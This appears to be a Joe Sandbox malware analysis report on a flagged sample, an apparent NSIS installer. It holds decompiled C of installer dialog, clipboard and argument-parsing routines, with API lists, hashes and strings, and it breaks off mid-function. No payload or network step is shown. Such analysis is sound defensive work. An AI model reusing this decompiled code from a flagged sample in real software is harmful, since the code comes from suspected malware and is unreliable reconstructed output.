                                                                        • Associated: 00000000.00000002.882292421.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.882342652.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.882351128.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.882361743.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.882369815.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.882380197.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                        Similarity
                                                                        • API ID: lstrcat$FileProcess$DirectoryExit$CurrentDeleteEnvironmentPathTempTokenVariableVersionWindows$AdjustCharCloseCommandCopyCreateErrorHandleInfoInitializeLineLookupModeNextOpenPrivilegePrivilegesUninitializeValuelstrcmpilstrlen
                                                                        • String ID: "C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.6939.7902.exe" $.tmp$1033$C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.6939.7902.exe$Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Low$NSIS Error$SeShutdownPrivilege$TEMP$TMP$UXTHEME$\Temp$~nsu
                                                                        • API String ID: 3859024572-2837269722
                                                                        • Opcode ID: e0a8c6016783217a32738e87f4e0326041da0509f66f4411adb9540052cd23fd
                                                                        • Instruction ID: d56582c8b11bee4b9d4e83ad1f604629a9588d533935b381636b20c84fba3529
                                                                        • Opcode Fuzzy Hash: e0a8c6016783217a32738e87f4e0326041da0509f66f4411adb9540052cd23fd
                                                                        • Instruction Fuzzy Hash: D4E1F471A00214AADB20AFB58D45A6E3EB8EB05709F50847FF945B32D1DB7C8A41CB6D
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 143 405809-405824 144 4059b3-4059ba 143->144 145 40582a-4058f1 GetDlgItem * 3 call 4045f9 call 404f52 GetClientRect GetSystemMetrics SendMessageW * 2 143->145 147 4059e4-4059f1 144->147 148 4059bc-4059de GetDlgItem CreateThread FindCloseChangeNotification 144->148 163 4058f3-40590d SendMessageW * 2 145->163 164 40590f-405912 145->164 149 4059f3-4059f9 147->149 150 405a0f-405a19 147->150 148->147 152 405a34-405a3d call 40462b 149->152 153 4059fb-405a0a ShowWindow * 2 call 4045f9 149->153 154 405a1b-405a21 150->154 155 405a6f-405a73 150->155 167 405a42-405a46 152->167 153->150 160 405a23-405a2f call 40459d 154->160 161 405a49-405a59 ShowWindow 154->161 155->152 158 405a75-405a7b 155->158 158->152 165 405a7d-405a90 SendMessageW 158->165 160->152 168 405a69-405a6a call 40459d 161->168 169 405a5b-405a64 call 4056ca 161->169 163->164 170 405922-405939 call 4045c4 164->170 171 405914-405920 SendMessageW 164->171 172 405b92-405b94 165->172 173 405a96-405ac1 CreatePopupMenu call 4066a5 AppendMenuW 165->173 168->155 169->168 182 40593b-40594f ShowWindow 170->182 183 40596f-405990 GetDlgItem SendMessageW 170->183 171->170 172->167 180 405ac3-405ad3 GetWindowRect 173->180 181 405ad6-405aeb TrackPopupMenu 173->181 180->181 181->172 184 405af1-405b08 181->184 185 405951-40595c ShowWindow 182->185 186 40595e 182->186 183->172 187 405996-4059ae SendMessageW * 2 183->187 188 405b0d-405b28 SendMessageW 184->188 189 405964-40596a call 4045f9 185->189 186->189 187->172 188->188 190 405b2a-405b4d OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 188->190 189->183 192 405b4f-405b76 SendMessageW 190->192 192->192 193 405b78-405b8c GlobalUnlock SetClipboardData CloseClipboard 192->193 193->172
                                                                        C-Code - Quality: 95%
                                                                        			E00405809(struct HWND__* _a4, long _a8, long _a12, unsigned int _a16) {
                                                                        				struct HWND__* _v8;
                                                                        				long _v12;
                                                                        				struct tagRECT _v28;
                                                                        				void* _v36;
                                                                        				signed int _v40;
                                                                        				int _v44;
                                                                        				int _v48;
                                                                        				signed int _v52;
                                                                        				int _v56;
                                                                        				void* _v60;
                                                                        				void* _v68;
                                                                        				void* __ebx;
                                                                        				void* __edi;
                                                                        				void* __esi;
                                                                        				struct HWND__* _t94;
                                                                        				long _t95;
                                                                        				int _t100;
                                                                        				void* _t108;
                                                                        				intOrPtr _t119;
                                                                        				void* _t127;
                                                                        				intOrPtr _t130;
                                                                        				struct HWND__* _t134;
                                                                        				int _t156;
                                                                        				int _t159;
                                                                        				struct HMENU__* _t164;
                                                                        				struct HWND__* _t168;
                                                                        				struct HWND__* _t169;
                                                                        				int _t171;
                                                                        				void* _t172;
                                                                        				short* _t173;
                                                                        				short* _t175;
                                                                        				int _t177;
                                                                        
                                                                        				_t169 =  *0x429244;
                                                                        				_t156 = 0;
                                                                        				_v8 = _t169;
                                                                        				if(_a8 != 0x110) {
                                                                        					if(_a8 == 0x405) {
                                                                        						_t127 = CreateThread(0, 0, E0040579D, GetDlgItem(_a4, 0x3ec), 0,  &_v12); // executed
                                                                        						FindCloseChangeNotification(_t127); // executed
                                                                        					}
                                                                        					if(_a8 != 0x111) {
                                                                        						L17:
                                                                        						_t171 = 1;
                                                                        						if(_a8 != 0x404) {
                                                                        							L25:
                                                                        							if(_a8 != 0x7b) {
                                                                        								goto L20;
                                                                        							}
                                                                        							_t94 = _v8;
                                                                        							if(_a12 != _t94) {
                                                                        								goto L20;
                                                                        							}
                                                                        							_t95 = SendMessageW(_t94, 0x1004, _t156, _t156);
                                                                        							_a8 = _t95;
                                                                        							if(_t95 <= _t156) {
                                                                        								L36:
                                                                        								return 0;
                                                                        							}
                                                                        							_t164 = CreatePopupMenu();
                                                                        							AppendMenuW(_t164, _t156, _t171, E004066A5(_t156, _t164, _t171, _t156, 0xffffffe1));
                                                                        							_t100 = _a16;
                                                                        							_t159 = _a16 >> 0x10;
                                                                        							if(_a16 == 0xffffffff) {
                                                                        								GetWindowRect(_v8,  &_v28);
                                                                        								_t100 = _v28.left;
                                                                        								_t159 = _v28.top;
                                                                        							}
                                                                        							if(TrackPopupMenu(_t164, 0x180, _t100, _t159, _t156, _a4, _t156) == _t171) {
                                                                        								_v60 = _t156;
                                                                        								_v48 = 0x423748;
                                                                        								_v44 = 0x1000;
                                                                        								_a4 = _a8;
                                                                        								do {
                                                                        									_a4 = _a4 - 1;
                                                                        									_t171 = _t171 + SendMessageW(_v8, 0x1073, _a4,  &_v68) + 2;
                                                                        								} while (_a4 != _t156);
                                                                        								OpenClipboard(_t156);
                                                                        								EmptyClipboard();
                                                                        								_t108 = GlobalAlloc(0x42, _t171 + _t171);
                                                                        								_a4 = _t108;
                                                                        								_t172 = GlobalLock(_t108);
                                                                        								do {
                                                                        									_v48 = _t172;
                                                                        									_t173 = _t172 + SendMessageW(_v8, 0x1073, _t156,  &_v68) * 2;
                                                                        									 *_t173 = 0xd;
                                                                        									_t175 = _t173 + 2;
                                                                        									 *_t175 = 0xa;
                                                                        									_t172 = _t175 + 2;
                                                                        									_t156 = _t156 + 1;
                                                                        								} while (_t156 < _a8);
                                                                        								GlobalUnlock(_a4);
                                                                        								SetClipboardData(0xd, _a4);
                                                                        								CloseClipboard();
                                                                        							}
                                                                        							goto L36;
                                                                        						}
                                                                        						if( *0x42922c == _t156) {
                                                                        							ShowWindow( *0x42a268, 8);
                                                                        							if( *0x42a2ec == _t156) {
                                                                        								_t119 =  *0x422720; // 0x70d9dc
                                                                        								E004056CA( *((intOrPtr*)(_t119 + 0x34)), _t156);
                                                                        							}
                                                                        							E0040459D(_t171);
                                                                        							goto L25;
                                                                        						}
                                                                        						 *0x421f18 = 2;
                                                                        						E0040459D(0x78);
                                                                        						goto L20;
                                                                        					} else {
                                                                        						if(_a12 != 0x403) {
                                                                        							L20:
                                                                        							return E0040462B(_a8, _a12, _a16);
                                                                        						}
                                                                        						ShowWindow( *0x429230, _t156);
                                                                        						ShowWindow(_t169, 8);
                                                                        						E004045F9(_t169);
                                                                        						goto L17;
                                                                        					}
                                                                        				}
                                                                        				_v52 = _v52 | 0xffffffff;
                                                                        				_v40 = _v40 | 0xffffffff;
                                                                        				_t177 = 2;
                                                                        				_v60 = _t177;
                                                                        				_v56 = 0;
                                                                        				_v48 = 0;
                                                                        				_v44 = 0;
                                                                        				asm("stosd");
                                                                        				asm("stosd");
                                                                        				_t130 =  *0x42a270;
                                                                        				_a8 =  *((intOrPtr*)(_t130 + 0x5c));
                                                                        				_a12 =  *((intOrPtr*)(_t130 + 0x60));
                                                                        				 *0x429230 = GetDlgItem(_a4, 0x403);
                                                                        				 *0x429228 = GetDlgItem(_a4, 0x3ee);
                                                                        				_t134 = GetDlgItem(_a4, 0x3f8);
                                                                        				 *0x429244 = _t134;
                                                                        				_v8 = _t134;
                                                                        				E004045F9( *0x429230);
                                                                        				 *0x429234 = E00404F52(4);
                                                                        				 *0x42924c = 0;
                                                                        				GetClientRect(_v8,  &_v28);
                                                                        				_v52 = _v28.right - GetSystemMetrics(_t177);
                                                                        				SendMessageW(_v8, 0x1061, 0,  &_v60); // executed
                                                                        				SendMessageW(_v8, 0x1036, 0x4000, 0x4000); // executed
                                                                        				if(_a8 >= 0) {
                                                                        					SendMessageW(_v8, 0x1001, 0, _a8);
                                                                        					SendMessageW(_v8, 0x1026, 0, _a8);
                                                                        				}
                                                                        				if(_a12 >= _t156) {
                                                                        					SendMessageW(_v8, 0x1024, _t156, _a12);
                                                                        				}
                                                                        				_push( *((intOrPtr*)(_a16 + 0x30)));
                                                                        				_push(0x1b);
                                                                        				E004045C4(_a4);
                                                                        				if(( *0x42a278 & 0x00000003) != 0) {
                                                                        					ShowWindow( *0x429230, _t156);
                                                                        					if(( *0x42a278 & 0x00000002) != 0) {
                                                                        						 *0x429230 = _t156;
                                                                        					} else {
                                                                        						ShowWindow(_v8, 8);
                                                                        					}
                                                                        					E004045F9( *0x429228);
                                                                        				}
                                                                        				_t168 = GetDlgItem(_a4, 0x3ec);
                                                                        				SendMessageW(_t168, 0x401, _t156, 0x75300000);
                                                                        				if(( *0x42a278 & 0x00000004) != 0) {
                                                                        					SendMessageW(_t168, 0x409, _t156, _a12);
                                                                        					SendMessageW(_t168, 0x2001, _t156, _a8);
                                                                        				}
                                                                        				goto L36;
                                                                        			}



































                                                                        0x00405811
                                                                        0x00405817
                                                                        0x00405821
                                                                        0x00405824
                                                                        0x004059ba
                                                                        0x004059d7
                                                                        0x004059de
                                                                        0x004059de
                                                                        0x004059f1
                                                                        0x00405a0f
                                                                        0x00405a11
                                                                        0x00405a19
                                                                        0x00405a6f
                                                                        0x00405a73
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00405a75
                                                                        0x00405a7b
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00405a85
                                                                        0x00405a8d
                                                                        0x00405a90
                                                                        0x00405b92
                                                                        0x00000000
                                                                        0x00405b92
                                                                        0x00405a9f
                                                                        0x00405aaa
                                                                        0x00405ab3
                                                                        0x00405abe
                                                                        0x00405ac1
                                                                        0x00405aca
                                                                        0x00405ad0
                                                                        0x00405ad3
                                                                        0x00405ad3
                                                                        0x00405aeb
                                                                        0x00405af4
                                                                        0x00405af7
                                                                        0x00405afe
                                                                        0x00405b05
                                                                        0x00405b0d
                                                                        0x00405b0d
                                                                        0x00405b24
                                                                        0x00405b24
                                                                        0x00405b2b
                                                                        0x00405b31
                                                                        0x00405b3d
                                                                        0x00405b44
                                                                        0x00405b4d
                                                                        0x00405b4f
                                                                        0x00405b52
                                                                        0x00405b61
                                                                        0x00405b64
                                                                        0x00405b6a
                                                                        0x00405b6b
                                                                        0x00405b71
                                                                        0x00405b72
                                                                        0x00405b73
                                                                        0x00405b7b
                                                                        0x00405b86
                                                                        0x00405b8c
                                                                        0x00405b8c
                                                                        0x00000000
                                                                        0x00405aeb
                                                                        0x00405a21
                                                                        0x00405a51
                                                                        0x00405a59
                                                                        0x00405a5b
                                                                        0x00405a64
                                                                        0x00405a64
                                                                        0x00405a6a
                                                                        0x00000000
                                                                        0x00405a6a
                                                                        0x00405a25
                                                                        0x00405a2f
                                                                        0x00000000
                                                                        0x004059f3
                                                                        0x004059f9
                                                                        0x00405a34
                                                                        0x00000000
                                                                        0x00405a3d
                                                                        0x00405a02
                                                                        0x00405a07
                                                                        0x00405a0a
                                                                        0x00000000
                                                                        0x00405a0a
                                                                        0x004059f1
                                                                        0x0040582a
                                                                        0x0040582e
                                                                        0x00405836
                                                                        0x0040583a
                                                                        0x0040583d
                                                                        0x00405840
                                                                        0x00405843
                                                                        0x00405846
                                                                        0x00405847
                                                                        0x00405848
                                                                        0x00405861
                                                                        0x00405864
                                                                        0x0040586e
                                                                        0x0040587d
                                                                        0x00405885
                                                                        0x0040588d
                                                                        0x00405892
                                                                        0x00405895
                                                                        0x004058a1
                                                                        0x004058aa
                                                                        0x004058b3
                                                                        0x004058d5
                                                                        0x004058db
                                                                        0x004058ec
                                                                        0x004058f1
                                                                        0x004058ff
                                                                        0x0040590d
                                                                        0x0040590d
                                                                        0x00405912
                                                                        0x00405920
                                                                        0x00405920
                                                                        0x00405925
                                                                        0x00405928
                                                                        0x0040592d
                                                                        0x00405939
                                                                        0x00405942
                                                                        0x0040594f
                                                                        0x0040595e
                                                                        0x00405951
                                                                        0x00405956
                                                                        0x00405956
                                                                        0x0040596a
                                                                        0x0040596a
                                                                        0x0040597e
                                                                        0x00405987
                                                                        0x00405990
                                                                        0x004059a0
                                                                        0x004059ac
                                                                        0x004059ac
                                                                        0x00000000

                                                                        APIs
                                                                        • GetDlgItem.USER32 ref: 00405867
                                                                        • GetDlgItem.USER32 ref: 00405876
                                                                        • GetClientRect.USER32 ref: 004058B3
                                                                        • GetSystemMetrics.USER32 ref: 004058BA
                                                                        • SendMessageW.USER32(?,00001061,00000000,?), ref: 004058DB
                                                                        • SendMessageW.USER32(?,00001036,00004000,00004000), ref: 004058EC
                                                                        • SendMessageW.USER32(?,00001001,00000000,00000110), ref: 004058FF
                                                                        • SendMessageW.USER32(?,00001026,00000000,00000110), ref: 0040590D
                                                                        • SendMessageW.USER32(?,00001024,00000000,?), ref: 00405920
                                                                        • ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 00405942
                                                                        • ShowWindow.USER32(?,00000008), ref: 00405956
                                                                        • GetDlgItem.USER32 ref: 00405977
                                                                        • SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 00405987
                                                                        • SendMessageW.USER32(00000000,00000409,00000000,?), ref: 004059A0
                                                                        • SendMessageW.USER32(00000000,00002001,00000000,00000110), ref: 004059AC
                                                                        • GetDlgItem.USER32 ref: 00405885
                                                                          • Part of subcall function 004045F9: SendMessageW.USER32(00000028,?,00000001,00404424), ref: 00404607
                                                                        • GetDlgItem.USER32 ref: 004059C9
                                                                        • CreateThread.KERNELBASE ref: 004059D7
                                                                        • FindCloseChangeNotification.KERNELBASE(00000000), ref: 004059DE
                                                                        • ShowWindow.USER32(00000000), ref: 00405A02
                                                                        • ShowWindow.USER32(?,00000008), ref: 00405A07
                                                                        • ShowWindow.USER32(00000008), ref: 00405A51
                                                                        • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405A85
                                                                        • CreatePopupMenu.USER32 ref: 00405A96
                                                                        • AppendMenuW.USER32 ref: 00405AAA
                                                                        • GetWindowRect.USER32 ref: 00405ACA
                                                                        • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 00405AE3
                                                                        • SendMessageW.USER32(?,00001073,00000000,?), ref: 00405B1B
                                                                        • OpenClipboard.USER32(00000000), ref: 00405B2B
                                                                        • EmptyClipboard.USER32 ref: 00405B31
                                                                        • GlobalAlloc.KERNEL32(00000042,00000000), ref: 00405B3D
                                                                        • GlobalLock.KERNEL32 ref: 00405B47
                                                                        • SendMessageW.USER32(?,00001073,00000000,?), ref: 00405B5B
                                                                        • GlobalUnlock.KERNEL32(00000000), ref: 00405B7B
                                                                        • SetClipboardData.USER32(0000000D,00000000), ref: 00405B86
                                                                        • CloseClipboard.USER32 ref: 00405B8C
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.882263654.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.882255021.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.882283133.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.882292421.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.882342652.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.882351128.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.882361743.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.882369815.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.882380197.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                        Similarity
                                                                        • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendChangeClientDataEmptyFindLockMetricsNotificationOpenSystemThreadTrackUnlock
                                                                        • String ID: H7B${
                                                                        • API String ID: 4154960007-2256286769
                                                                        • Opcode ID: acb4607de909606c36dfaba2b406014313c5fa90e55702556e162a5684d31028
                                                                        • Instruction ID: d0bbb34d81c2c7a38b5cdb5171fa906e4f4201ee6cbe22cb0b3272b57562556b
                                                                        • Opcode Fuzzy Hash: acb4607de909606c36dfaba2b406014313c5fa90e55702556e162a5684d31028
                                                                        • Instruction Fuzzy Hash: D8B137B0900608FFDF119FA0DD89AAE7B79FB08354F00417AFA45A61A0CB755E52DF68
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 95%
                                                                        			E72491BFF() {
                                                                        				signed int _v8;
                                                                        				signed int _v12;
                                                                        				signed int _v16;
                                                                        				signed int _v20;
                                                                        				WCHAR* _v24;
                                                                        				WCHAR* _v28;
                                                                        				signed int _v32;
                                                                        				signed int _v36;
                                                                        				signed int _v40;
                                                                        				signed int _v44;
                                                                        				WCHAR* _v48;
                                                                        				signed int _v52;
                                                                        				void* _v56;
                                                                        				intOrPtr _v60;
                                                                        				WCHAR* _t208;
                                                                        				signed int _t211;
                                                                        				void* _t213;
                                                                        				void* _t215;
                                                                        				WCHAR* _t217;
                                                                        				void* _t225;
                                                                        				struct HINSTANCE__* _t226;
                                                                        				struct HINSTANCE__* _t227;
                                                                        				struct HINSTANCE__* _t229;
                                                                        				signed short _t231;
                                                                        				struct HINSTANCE__* _t234;
                                                                        				struct HINSTANCE__* _t236;
                                                                        				void* _t237;
                                                                        				intOrPtr* _t238;
                                                                        				void* _t249;
                                                                        				signed char _t250;
                                                                        				signed int _t251;
                                                                        				void* _t255;
                                                                        				struct HINSTANCE__* _t257;
                                                                        				void* _t258;
                                                                        				signed int _t260;
                                                                        				signed int _t261;
                                                                        				signed short* _t264;
                                                                        				signed int _t269;
                                                                        				signed int _t272;
                                                                        				signed int _t274;
                                                                        				void* _t277;
                                                                        				void* _t281;
                                                                        				struct HINSTANCE__* _t283;
                                                                        				signed int _t286;
                                                                        				void _t287;
                                                                        				signed int _t288;
                                                                        				signed int _t300;
                                                                        				signed int _t301;
                                                                        				signed short _t304;
                                                                        				void* _t305;
                                                                        				signed int _t309;
                                                                        				signed int _t312;
                                                                        				signed int _t315;
                                                                        				signed int _t316;
                                                                        				signed int _t317;
                                                                        				signed short* _t321;
                                                                        				WCHAR* _t322;
                                                                        				WCHAR* _t324;
                                                                        				WCHAR* _t325;
                                                                        				struct HINSTANCE__* _t326;
                                                                        				void* _t328;
                                                                        				signed int _t331;
                                                                        				void* _t332;
                                                                        
                                                                        				_t283 = 0;
                                                                        				_v32 = 0;
                                                                        				_v36 = 0;
                                                                        				_v16 = 0;
                                                                        				_v8 = 0;
                                                                        				_v40 = 0;
                                                                        				_t332 = 0;
                                                                        				_v52 = 0;
                                                                        				_v44 = 0;
                                                                        				_t208 = E724912BB();
                                                                        				_v24 = _t208;
                                                                        				_v28 = _t208;
                                                                        				_v48 = E724912BB();
                                                                        				_t321 = E724912E3();
                                                                        				_v56 = _t321;
                                                                        				_v12 = _t321;
                                                                        				while(1) {
                                                                        					_t211 = _v32;
                                                                        					_v60 = _t211;
                                                                        					if(_t211 != _t283 && _t332 == _t283) {
                                                                        						break;
                                                                        					}
                                                                        					_t286 =  *_t321 & 0x0000ffff;
                                                                        					_t213 = _t286 - _t283;
                                                                        					if(_t213 == 0) {
                                                                        						_t37 =  &_v32;
                                                                        						 *_t37 = _v32 | 0xffffffff;
                                                                        						__eflags =  *_t37;
                                                                        						L20:
                                                                        						_t215 = _v60 - _t283;
                                                                        						if(_t215 == 0) {
                                                                        							__eflags = _t332 - _t283;
                                                                        							 *_v28 = _t283;
                                                                        							if(_t332 == _t283) {
                                                                        								_t255 = GlobalAlloc(0x40, 0x1ca4); // executed
                                                                        								_t332 = _t255;
                                                                        								 *(_t332 + 0x1010) = _t283;
                                                                        								 *(_t332 + 0x1014) = _t283;
                                                                        							}
                                                                        							_t287 = _v36;
                                                                        							_t47 = _t332 + 8; // 0x8
                                                                        							_t217 = _t47;
                                                                        							_t48 = _t332 + 0x808; // 0x808
                                                                        							_t322 = _t48;
                                                                        							 *_t332 = _t287;
                                                                        							_t288 = _t287 - _t283;
                                                                        							__eflags = _t288;
                                                                        							 *_t217 = _t283;
                                                                        							 *_t322 = _t283;
                                                                        							 *(_t332 + 0x1008) = _t283;
                                                                        							 *(_t332 + 0x100c) = _t283;
                                                                        							 *(_t332 + 4) = _t283;
                                                                        							if(_t288 == 0) {
                                                                        								__eflags = _v28 - _v24;
                                                                        								if(_v28 == _v24) {
                                                                        									goto L42;
                                                                        								}
                                                                        								_t328 = 0;
                                                                        								GlobalFree(_t332);
                                                                        								_t332 = E724913B1(_v24);
                                                                        								__eflags = _t332 - _t283;
                                                                        								if(_t332 == _t283) {
                                                                        									goto L42;
                                                                        								} else {
                                                                        									goto L35;
                                                                        								}
                                                                        								while(1) {
                                                                        									L35:
                                                                        									_t249 =  *(_t332 + 0x1ca0);
                                                                        									__eflags = _t249 - _t283;
                                                                        									if(_t249 == _t283) {
                                                                        										break;
                                                                        									}
                                                                        									_t328 = _t332;
                                                                        									_t332 = _t249;
                                                                        									__eflags = _t332 - _t283;
                                                                        									if(_t332 != _t283) {
                                                                        										continue;
                                                                        									}
                                                                        									break;
                                                                        								}
                                                                        								__eflags = _t328 - _t283;
                                                                        								if(_t328 != _t283) {
                                                                        									 *(_t328 + 0x1ca0) = _t283;
                                                                        								}
                                                                        								_t250 =  *(_t332 + 0x1010);
                                                                        								__eflags = _t250 & 0x00000008;
                                                                        								if((_t250 & 0x00000008) == 0) {
                                                                        									_t251 = _t250 | 0x00000002;
                                                                        									__eflags = _t251;
                                                                        									 *(_t332 + 0x1010) = _t251;
                                                                        								} else {
                                                                        									_t332 = E7249162F(_t332);
                                                                        									 *(_t332 + 0x1010) =  *(_t332 + 0x1010) & 0xfffffff5;
                                                                        								}
                                                                        								goto L42;
                                                                        							} else {
                                                                        								_t300 = _t288 - 1;
                                                                        								__eflags = _t300;
                                                                        								if(_t300 == 0) {
                                                                        									L31:
                                                                        									lstrcpyW(_t217, _v48);
                                                                        									L32:
                                                                        									lstrcpyW(_t322, _v24);
                                                                        									goto L42;
                                                                        								}
                                                                        								_t301 = _t300 - 1;
                                                                        								__eflags = _t301;
                                                                        								if(_t301 == 0) {
                                                                        									goto L32;
                                                                        								}
                                                                        								__eflags = _t301 != 1;
                                                                        								if(_t301 != 1) {
                                                                        									goto L42;
                                                                        								}
                                                                        								goto L31;
                                                                        							}
                                                                        						} else {
                                                                        							if(_t215 == 1) {
                                                                        								_t257 = _v16;
                                                                        								if(_v40 == _t283) {
                                                                        									_t257 = _t257 - 1;
                                                                        								}
                                                                        								 *(_t332 + 0x1014) = _t257;
                                                                        							}
                                                                        							L42:
                                                                        							_v12 = _v12 + 2;
                                                                        							_v28 = _v24;
                                                                        							L59:
                                                                        							if(_v32 != 0xffffffff) {
                                                                        								_t321 = _v12;
                                                                        								continue;
                                                                        							}
                                                                        							break;
                                                                        						}
                                                                        					}
                                                                        					_t258 = _t213 - 0x23;
                                                                        					if(_t258 == 0) {
                                                                        						__eflags = _t321 - _v56;
                                                                        						if(_t321 <= _v56) {
                                                                        							L17:
                                                                        							__eflags = _v44 - _t283;
                                                                        							if(_v44 != _t283) {
                                                                        								L43:
                                                                        								_t260 = _v32 - _t283;
                                                                        								__eflags = _t260;
                                                                        								if(_t260 == 0) {
                                                                        									_t261 = _t286;
                                                                        									while(1) {
                                                                        										__eflags = _t261 - 0x22;
                                                                        										if(_t261 != 0x22) {
                                                                        											break;
                                                                        										}
                                                                        										_t321 =  &(_t321[1]);
                                                                        										__eflags = _v44 - _t283;
                                                                        										_v12 = _t321;
                                                                        										if(_v44 == _t283) {
                                                                        											_v44 = 1;
                                                                        											L162:
                                                                        											_v28 =  &(_v28[0]);
                                                                        											 *_v28 =  *_t321;
                                                                        											L58:
                                                                        											_t331 =  &(_t321[1]);
                                                                        											__eflags = _t331;
                                                                        											_v12 = _t331;
                                                                        											goto L59;
                                                                        										}
                                                                        										_t261 =  *_t321 & 0x0000ffff;
                                                                        										_v44 = _t283;
                                                                        									}
                                                                        									__eflags = _t261 - 0x2a;
                                                                        									if(_t261 == 0x2a) {
                                                                        										_v36 = 2;
                                                                        										L57:
                                                                        										_t321 = _v12;
                                                                        										_v28 = _v24;
                                                                        										_t283 = 0;
                                                                        										__eflags = 0;
                                                                        										goto L58;
                                                                        									}
                                                                        									__eflags = _t261 - 0x2d;
                                                                        									if(_t261 == 0x2d) {
                                                                        										L151:
                                                                        										_t304 =  *_t321;
                                                                        										__eflags = _t304 - 0x2d;
                                                                        										if(_t304 != 0x2d) {
                                                                        											L154:
                                                                        											_t264 =  &(_t321[1]);
                                                                        											__eflags =  *_t264 - 0x3a;
                                                                        											if( *_t264 != 0x3a) {
                                                                        												goto L162;
                                                                        											}
                                                                        											__eflags = _t304 - 0x2d;
                                                                        											if(_t304 == 0x2d) {
                                                                        												goto L162;
                                                                        											}
                                                                        											_v36 = 1;
                                                                        											L157:
                                                                        											_v12 = _t264;
                                                                        											__eflags = _v28 - _v24;
                                                                        											if(_v28 <= _v24) {
                                                                        												 *_v48 = _t283;
                                                                        											} else {
                                                                        												 *_v28 = _t283;
                                                                        												lstrcpyW(_v48, _v24);
                                                                        											}
                                                                        											goto L57;
                                                                        										}
                                                                        										_t264 =  &(_t321[1]);
                                                                        										__eflags =  *_t264 - 0x3e;
                                                                        										if( *_t264 != 0x3e) {
                                                                        											goto L154;
                                                                        										}
                                                                        										_v36 = 3;
                                                                        										goto L157;
                                                                        									}
                                                                        									__eflags = _t261 - 0x3a;
                                                                        									if(_t261 != 0x3a) {
                                                                        										goto L162;
                                                                        									}
                                                                        									goto L151;
                                                                        								}
                                                                        								_t269 = _t260 - 1;
                                                                        								__eflags = _t269;
                                                                        								if(_t269 == 0) {
                                                                        									L80:
                                                                        									_t305 = _t286 + 0xffffffde;
                                                                        									__eflags = _t305 - 0x55;
                                                                        									if(_t305 > 0x55) {
                                                                        										goto L57;
                                                                        									}
                                                                        									switch( *((intOrPtr*)(( *(_t305 + 0x724923e8) & 0x000000ff) * 4 +  &M7249235C))) {
                                                                        										case 0:
                                                                        											__ecx = _v24;
                                                                        											__edi = _v12;
                                                                        											while(1) {
                                                                        												__edi = __edi + 1;
                                                                        												__edi = __edi + 1;
                                                                        												_v12 = __edi;
                                                                        												__ax =  *__edi;
                                                                        												__eflags = __ax - __dx;
                                                                        												if(__ax != __dx) {
                                                                        													goto L132;
                                                                        												}
                                                                        												L131:
                                                                        												__eflags =  *((intOrPtr*)(__edi + 2)) - __dx;
                                                                        												if( *((intOrPtr*)(__edi + 2)) != __dx) {
                                                                        													L136:
                                                                        													 *__ecx =  *__ecx & 0x00000000;
                                                                        													__eax = E724912CC(_v24);
                                                                        													__ebx = __eax;
                                                                        													goto L97;
                                                                        												}
                                                                        												L132:
                                                                        												__eflags = __ax;
                                                                        												if(__ax == 0) {
                                                                        													goto L136;
                                                                        												}
                                                                        												__eflags = __ax - __dx;
                                                                        												if(__ax == __dx) {
                                                                        													__edi = __edi + 1;
                                                                        													__edi = __edi + 1;
                                                                        													__eflags = __edi;
                                                                        												}
                                                                        												__ax =  *__edi;
                                                                        												 *__ecx =  *__edi;
                                                                        												__ecx = __ecx + 1;
                                                                        												__ecx = __ecx + 1;
                                                                        												__edi = __edi + 1;
                                                                        												__edi = __edi + 1;
                                                                        												_v12 = __edi;
                                                                        												__ax =  *__edi;
                                                                        												__eflags = __ax - __dx;
                                                                        												if(__ax != __dx) {
                                                                        													goto L132;
                                                                        												}
                                                                        												goto L131;
                                                                        											}
                                                                        										case 1:
                                                                        											_v8 = 1;
                                                                        											goto L57;
                                                                        										case 2:
                                                                        											_v8 = _v8 | 0xffffffff;
                                                                        											goto L57;
                                                                        										case 3:
                                                                        											_v8 = _v8 & 0x00000000;
